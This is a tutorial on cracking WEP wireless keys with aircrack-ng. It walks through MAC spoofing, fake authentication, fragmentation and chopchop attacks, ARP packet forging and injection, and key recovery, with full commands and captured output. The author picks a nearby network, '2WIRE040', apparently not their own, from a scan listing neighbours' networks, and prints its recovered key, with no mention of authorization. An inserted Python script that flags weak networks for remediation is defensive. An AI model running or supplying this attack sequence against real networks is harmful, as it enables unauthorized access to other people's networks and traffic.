
1 - Set the wireless card MAC address
2 - Start the wireless interface in monitor mode
3 - Scan for WEP access points
4 - Pick out which WEP AP you want to attack, and associate airodump to that channel/bssid.
5 - Use aireplay-ng chopchop or fragmentation attack to obtain PRGA
6 - Use packetforge-ng to create an ARP packet
7 - Inject the ARP packet from step #6
Final Step - Crack the WEP key

Step 1: Set up the wireless card MAC address

This isn't really necessary, however the command to do so is macchanger -r mon0.
Keep in mind this applies to the card that I have; your interface may be different.
-r (random). By using this flag the MAC address generated will be random.

root@bt:~# macchanger -r wlan0
Current MAC: 00:c0:ca:33:7f:72 (Alfa, Inc.)
Faked MAC: 36:b1:e6:05:32:da (unknown)
Step 2: Start the wireless interface in monitor mode

airmon-ng start wlan0
Note once again wlan0 is my interface. Feel free to check for yours with the iwconfig command.
You should see the following:

root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wlan0           RTL8187         rtl8187 - [phy0]
                                (monitor mode enabled on mon1)
mon0            RTL8187         rtl8187 - [phy0]

If you see "monitor mode enabled" you know you're good to go.

Step 3. Scan for WEP access points

airodump-ng mon0
You should see something like this.

CH 7 ][ Elapsed: 16 s ][ 2010-09-01 00:39

BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:24:A5:AD:79:59  -13       26      0    0   6  54e. WPA2 CCMP   PSK  PwnSauce
00:1C:10:A1:C1:32  -61        3      0    0  11  54   WEP  WEP         dusty
00:1B:5B:B3:B5:71  -63        4      2    0   8  54 . WEP  WEP         2WIRE486
00:18:39:B1:4D:DD  -64       14      0    0   1  54   WPA2 CCMP   PSK  rocky4191980net
00:19:E4:48:97:A9  -63       11      0    0   1  54 . WEP  WEP         2WIRE040
00:18:39:62:34:EE  -63       19      0    0   6  54   OPN              linksys
00:25:3C:F1:C9:E9  -66        5      0    0  11  54 . WEP  WEP         2WIRE266
00:1A:70:00:77:E4  -64       13      0    0   6  54   OPN              Moyers
00:18:3F:2B:A2:01  -67        7      0    0   1  54 . WEP  WEP         2WIRE305
00:26:50:D0:4D:C9  -69        2      0    0   6  54 . WEP  WEP         2WIRE705
00:0F:66:D2:6E:F4  -70        5      0    0   6  54 . WPA  TKIP   PSK  HFNET
00:1D:7E:97:C0:1D  -71        4      0    0   1  54e  WPA2 CCMP   PSK  RRlinksys
00:1E:E5:EB:63:6C  -69        5      0    0   6  54e. WPA2 CCMP   PSK  jake wireless
00:23:51:3B:89:D1  -71        3      0    0   3  54 . WEP  WEP         2WIRE629
00:24:B2:51:C6:CA  -71        3      0    0   1  54e. WPA2 CCMP   PSK  Pepp-Main-Office2.4Ghz

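As an added example (not part of the original tutorial), here is a small Python audit script that parses the airodump-ng table layout shown above and flags every network still running WEP or no encryption, the ones an administrator has to migrate to WPA2/CCMP. The sample scan text is transcribed from the table above, and the column regex is my own assumption about the layout, not an aircrack-ng API.

```python
import re
# Sample airodump-ng scan, transcribed from the table shown above (constructed for this example).
SAMPLE_SCAN = """\
BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:24:A5:AD:79:59  -13       26      0    0   6  54e. WPA2 CCMP   PSK  PwnSauce
00:1C:10:A1:C1:32  -61        3      0    0  11  54   WEP  WEP         dusty
00:1B:5B:B3:B5:71  -63        4      2    0   8  54 . WEP  WEP         2WIRE486
00:18:39:B1:4D:DD  -64       14      0    0   1  54   WPA2 CCMP   PSK  rocky4191980net
00:19:E4:48:97:A9  -63       11      0    0   1  54 . WEP  WEP         2WIRE040
00:18:39:62:34:EE  -63       19      0    0   6  54   OPN              linksys
00:25:3C:F1:C9:E9  -66        5      0    0  11  54 . WEP  WEP         2WIRE266
00:1A:70:00:77:E4  -64       13      0    0   6  54   OPN              Moyers
00:18:3F:2B:A2:01  -67        7      0    0   1  54 . WEP  WEP         2WIRE305
00:26:50:D0:4D:C9  -69        2      0    0   6  54 . WEP  WEP         2WIRE705
00:0F:66:D2:6E:F4  -70        5      0    0   6  54 . WPA  TKIP   PSK  HFNET
00:1D:7E:97:C0:1D  -71        4      0    0   1  54e  WPA2 CCMP   PSK  RRlinksys
00:1E:E5:EB:63:6C  -69        5      0    0   6  54e. WPA2 CCMP   PSK  jake wireless
00:23:51:3B:89:D1  -71        3      0    0   3  54 . WEP  WEP         2WIRE629
00:24:B2:51:C6:CA  -71        3      0    0   1  54e. WPA2 CCMP   PSK  Pepp-Main-Office2.4Ghz
"""

# One AP row: BSSID PWR Beacons #Data #/s CH MB ENC [CIPHER] [AUTH] ESSID; MB may carry "e"/"." markers ("54e.", "54 .").
ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-F]{2}:){5}[0-9A-F]{2})\s+(?P<pwr>-?\d+)\s+(?P<beacons>\d+)\s+"
    r"(?P<data>\d+)\s+(?P<rate>\d+)\s+(?P<ch>\d+)\s+(?P<mb>\d+e?\s?\.?)\s+"
    r"(?P<enc>WPA2|WPA|WEP|OPN)\s*(?P<cipher>CCMP|TKIP|WEP)?\s*(?P<auth>PSK|MGT|SKA)?"
    r"\s+(?P<essid>.*\S)\s*$", re.IGNORECASE)

def risk(enc, cipher):
    # Map the ENC/CIPHER columns to an audit verdict.
    enc = enc.upper()
    if enc == "OPN":
        return "CRITICAL: no encryption"
    if enc == "WEP":
        return "CRITICAL: WEP, key recoverable from captured traffic"
    if enc == "WPA" or (cipher or "").upper() == "TKIP":
        return "WARN: legacy WPA/TKIP"
    return "OK: WPA2/CCMP"

def parse_scan(text):
    # One dict per AP row (header and blank lines do not match), plus a 'risk' verdict.
    nets = [m.groupdict() for m in (ROW.match(l.strip()) for l in text.splitlines()) if m]
    for net in nets:
        net["risk"] = risk(net["enc"], net["cipher"])
    return nets

def weak_networks(text):
    # (ESSID, BSSID) of every AP that must be migrated to WPA2/CCMP or better.
    return [(n["essid"], n["bssid"]) for n in parse_scan(text) if n["risk"].startswith("CRITICAL")]
```

Run against a saved airodump-ng screen and the weak list is the remediation queue; in the sample above it is 7 WEP and 2 open networks out of 15.
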
Step 4. Pick out which WEP AP you want to attack, and associate airodump to that channel/bssid.

In this case I have decided on 2WIRE040.
airodump-ng -c 1 --bssid 00:19:E4:48:97:A9 -w wepcrack mon0
-c is the channel, in this case 1
--bssid is the Access Point's MAC
-w is the capture file name, in this case wepcrack
mon0 is the wireless interface name

Step 4b. Use aireplay-ng to do a fake authentication with the WAP.

aireplay-ng -1 0 -e 2WIRE040 -a 00:19:E4:48:97:A9 -h 36:b1:e6:05:32:da mon0
-1 means the fake authentication attack
0 is how often it will time out, in seconds
-e is the SSID name, in this case 2WIRE040
-a is the Access Point's MAC
-h is your MAC address, in this case 36:b1:e6:05:32:da
mon0 is the wireless interface name
You should see something similar to this:
00:47:56 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1
00:47:56 Sending Authentication Request (Open System) [ACK]
00:47:56 Authentication successful
00:47:56 Sending Association Request [ACK]
00:48:01 Sending Authentication Request (Open System) [ACK]
00:48:01 Authentication successful
00:48:01 Sending Association Request [ACK]
00:48:01 Association successful :-) (AID: 1)

Step 5. Use aireplay-ng chopchop or fragmentation attack to obtain PRGA

Let's use the fragmentation attack first.
aireplay-ng -5 -b 00:19:E4:48:97:A9 -h 36:b1:e6:05:32:da mon0
-5 is the fragmentation attack
-b is the WAP MAC address, in this case 00:19:E4:48:97:A9
-h is your MAC address, in this case 36:b1:e6:05:32:da
You should see this:
00:51:26 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1
00:51:26 Waiting for a data packet...
Read 114 packets...
Size: 68, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:19:E4:48:97:A9
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:19:E4:48:97:A9
0x0000:  0842 0000 ffff ffff ffff 0019 e448 97a9  .B...........H..
0x0010:  0019 e448 97a9 2055 df6b 2c00 2d25 81d7  ...H.. U.k,.-%..
0x0020:  c27e 6181 7323 1df2 b8ba 990f 2470 b5c5  .~a.s#......$p..
0x0030:  e377 3200 045a 849c 835f a199 3763 6ad6  .w2..Z..._..7cj.
0x0040:  c366 64cc                                .fd.

Use this packet ? Y


Saving chosen packet in replay_src-0901-005130.cap
00:51:40 Data packet found!
00:51:40 Sending fragmented packet
00:51:40 Not enough acks, repeating...
00:51:40 Sending fragmented packet
00:51:42 No answer, repeating...
00:51:42 Trying a LLC NULL packet
00:51:42 Sending fragmented packet
00:51:42 Got RELAYED packet!!
00:51:42 Trying to get 384 bytes of a keystream
00:51:42 Got RELAYED packet!!
00:51:42 Trying to get 1500 bytes of a keystream
00:51:42 Got RELAYED packet!!
Saving keystream in fragment-0901-005142.xor

Now you can build a packet with packetforge-ng out of that 1500 byte keystream.
Was the previous step a failboat? If so you might want to use the chopchop attack seen below.
aireplay-ng -4 -h 36:b1:e6:05:32:da -b 00:19:E4:48:97:A9 mon0
-4 means the chopchop attack
-h is our host's MAC address, in this case 36:b1:e6:05:32:da
-b is our WAP MAC address, in this case 00:19:E4:48:97:A9
mon0 is the wireless interface
You should see something similar:
01:54:33 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1
Size: 68, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:19:E4:48:97:A9
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:19:E4:48:97:A9
0x0000:  0842 0000 ffff ffff ffff 0019 e448 97a9  .B...........H..
0x0010:  0019 e448 97a9 0094 e74d 9c00 37d2 4c5b  ...H.....M..7.L[
0x0020:  3410 24dd 7b04 bdc5 fc13 ada3 339d a06f  4.$.{.......3..o
0x0030:  d1e2 0825 ecc8 539e c1c5 321f 55c3 58f1  ...%..S...2.U.X.
0x0040:  1ca8 e016                                ....

Use this packet ? y


Saving chosen packet in replay_src-0901-015434.cap

Offset 67 ( 0% done) | xor = 08 | pt = 1E | 168 frames written in 2862ms
Offset 66 ( 2% done) | xor = 61 | pt = 81 | 426 frames written in 7247ms
Offset 65 ( 5% done) | xor = 2C | pt = 84 | 32 frames written in 536ms
Offset 64 ( 8% done) | xor = 0A | pt = 16 | 684 frames written in 11637ms
Offset 63 (11% done) | xor = 9A | pt = 6B | 326 frames written in 5539ms
Offset 62 (14% done) | xor = 59 | pt = 01 | 182 frames written in 3100ms
Offset 61 (17% done) | xor = 6B | pt = A8 | 39 frames written in 664ms
Offset 60 (20% done) | xor = 95 | pt = C0 | 654 frames written in 11111ms
Offset 59 (23% done) | xor = E0 | pt = FF | 14 frames written in 230ms
Offset 58 (26% done) | xor = CD | pt = FF | 753 frames written in 12813ms
Offset 57 (29% done) | xor = 3A | pt = FF | 669 frames written in 11369ms
Offset 56 (32% done) | xor = 3E | pt = FF | 19 frames written in 320ms
Offset 55 (35% done) | xor = 61 | pt = FF | 276 frames written in 4701ms
Offset 54 (38% done) | xor = AC | pt = FF | 1960 frames written in 33312ms
Offset 53 (41% done) | xor = 36 | pt = FE | 1100 frames written in 18705ms
Offset 52 (44% done) | xor = ED | pt = 01 | 91 frames written in 1546ms
Offset 51 (47% done) | xor = 8D | pt = A8 | 144 frames written in 2443ms
Offset 50 (50% done) | xor = C8 | pt = C0 | 42 frames written in 714ms
Offset 49 (52% done) | xor = 4B | pt = A9 | 173 frames written in 2941ms
Offset 48 (55% done) | xor = 46 | pt = 97 | 2360 frames written in 40130ms
Offset 47 (58% done) | xor = 27 | pt = 48 | 320 frames written in 5435ms
Offset 46 (61% done) | xor = 44 | pt = E4 | 1281 frames written in 21766ms
Offset 45 (64% done) | xor = 84 | pt = 19 | 1650 frames written in 28064ms
Offset 44 (67% done) | xor = 33 | pt = 00 | 241 frames written in 4091ms
Offset 43 (70% done) | xor = A2 | pt = 01 | 193 frames written in 3289ms
Offset 42 (73% done) | xor = AD | pt = 00 | 613 frames written in 10407ms
Offset 41 (76% done) | xor = 17 | pt = 04 | 163 frames written in 2776ms
Offset 40 (79% done) | xor = FA | pt = 06 | 1353 frames written in 23009ms
Offset 39 (82% done) | xor = C5 | pt = 00 | 136 frames written in 2305ms
Offset 38 (85% done) | xor = B5 | pt = 08 | 2027 frames written in 34467ms
Offset 37 (88% done) | xor = 05 | pt = 01 | 488 frames written in 8295ms
Offset 36 (91% done) | xor = 7B | pt = 00 | 18 frames written in 303ms
Offset 35 (94% done) | xor = DB | pt = 06 | 229 frames written in 3890ms
Offset 34 (97% done) | xor = 2C | pt = 08 | 404 frames written in 6871ms

Saving plaintext in replay_dec-0901-015714.cap
Saving keystream in replay_dec-0901-015714.xor
Completed in 152s (0.20 bytes/s)
Success :)

Step 6. Use packetforge-ng to create an ARP packet

packetforge-ng -0 -a 00:19:E4:48:97:A9 -h 36:b1:e6:05:32:da -k 255.255.255.255 -l 255.255.255.255 -y fragment-0901-005142.xor -w wepcrack
-0 means create an ARP packet
-a is the WAP MAC, in this case 00:19:E4:48:97:A9
-h is your MAC address, in this case 36:b1:e6:05:32:da
-k is the destination IP (most APs will work fine with this setting)
-l is the source IP (again, most APs will respond fine with this)
-y fragment-0901-005142.xor is the file you get your PRGA from
-w is the name of the file you wish to write the packet to, in this case wepcrack
Success will look like this:
Wrote packet to: wepcrack

Step 7. Inject the ARP packet

aireplay-ng -2 -r wepcrack mon0
-2 means interactive packet replay mode
-r is the file from which to read the ARP packet, in this case wepcrack
You should see something similar:
No source MAC (-h) specified. Using the device MAC (00:C0:CA:33:7F:72)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:19:E4:48:97:A9
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:C0:CA:33:7F:72
0x0000:  0841 0201 0019 e448 97a9 00c0 ca33 7f72  .A.....H.....3r
0x0010:  ffff ffff ffff 8001 df6e f700 79d3 cc92  .........n..y...
0x0020:  f911 0d44 a461 c287 e878 caf7 61ea edbc  ...D.a...x..a...
0x0030:  a2cc 2b96 c8fa 1097 cb73 75ac cfd6 f8c6  ..+......su.....
0x0040:  eea8 f908                                ....

Use this packet ? y

Now we wait for about 40,000 IVs. If you take a look at your airodump window you will see the data
start to skyrocket. When this reaches 40,000 hit Ctrl+C to kill the process.
Success :)

CH 1 ][ Elapsed: 27 mins ][ 2010-09-01 01:19

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:19:E4:48:97:A9  -67  33     8396    43869   41   1  54 . WEP  WEP         2WIRE040

Final Step: Crack the WEP key

aircrack-ng -b 00:19:E4:48:97:A9 wepcrack*.cap
-b is the WAP MAC address, in this case 00:19:E4:48:97:A9
After a few seconds you will get the key.

Aircrack-ng 1.0 r1645

[00:00:00] Tested 74 keys (got 43384 IVs)

KB   depth   byte(vote)
 0   0/  2   82(57088) CE(52224) 09(51968) F1(51712) 8A(51200) 3E(50944) 52(50432) 4E(50176) 4F(50176) 93(50176) 35(49920) EE(49920) 13(48896) 14(48896)
 1   1/  3   90(52736) F9(52224) 2E(51200) D5(50944) BA(50688) B9(50432) 51(49920) C1(49920) 48(49664) 35(49408) 12(49152) 9B(49152) F4(48896) 9D(48640)
 2   0/  1   73(60416) 49(54016) 79(52480) 11(52224) 22(52224) 7B(51712) EF(50944) 16(50432) 58(50432) 82(50432) D4(50432) 72(49664) 3A(49408) BA(49152)
 3   0/  6   08(56320) A8(54784) 1C(52992) B3(52736) 10(52224) 8D(51968) D8(50944) 82(50688) 10(50176) 0E(49920) CB(49920) F7(49408) 5F(49152) DA(49152)
 4   0/  3   80(55808) 00(52480) 0B(51456) FC(50944) 95(50432) B7(50432) AE(49920) C0(49408) E4(49152) 24(48896) 6D(48896) 82(48896) 7F(48640) D4(48640)

KEY FOUND! [ 82:77:73:08:80 ]
Decrypted correctly: 100%

I hope you enjoyed my tutorial.
Securityxxxpert
Note: I will be making a video as well to attach when time permits.
